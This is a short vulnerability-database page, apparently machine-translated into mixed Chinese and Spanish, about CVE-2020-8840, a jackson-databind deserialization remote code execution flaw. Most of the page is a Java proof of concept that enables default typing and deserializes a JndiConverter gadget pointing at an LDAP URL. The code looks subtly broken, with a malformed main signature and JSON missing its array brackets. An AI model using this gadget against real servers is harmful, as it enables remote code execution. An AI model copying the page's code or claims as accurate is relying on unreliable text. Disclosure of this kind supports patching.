◆◆0

CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞/es

免费、自由、人人可编辑的漏洞库

,

Impacto de la vulnerabilidad

jackson-databind 2.0.0 – 2.9.10.2

Se ha verificado que fastjson afecta a la última versión de fastjson v1.2.62 cuando la función autoType está activada

POC

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
   public static void main(String args) {
       ObjectMapper mapper = new ObjectMapper();

       mapper.enableDefaultTyping();

       String json = "\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}";

       try {
           mapper.readValue(json, Object.class);
       } catch (IOException e) {
           e.printStackTrace();
       }

   }
}

免费、自由、人人可编辑的漏洞库

返回顶部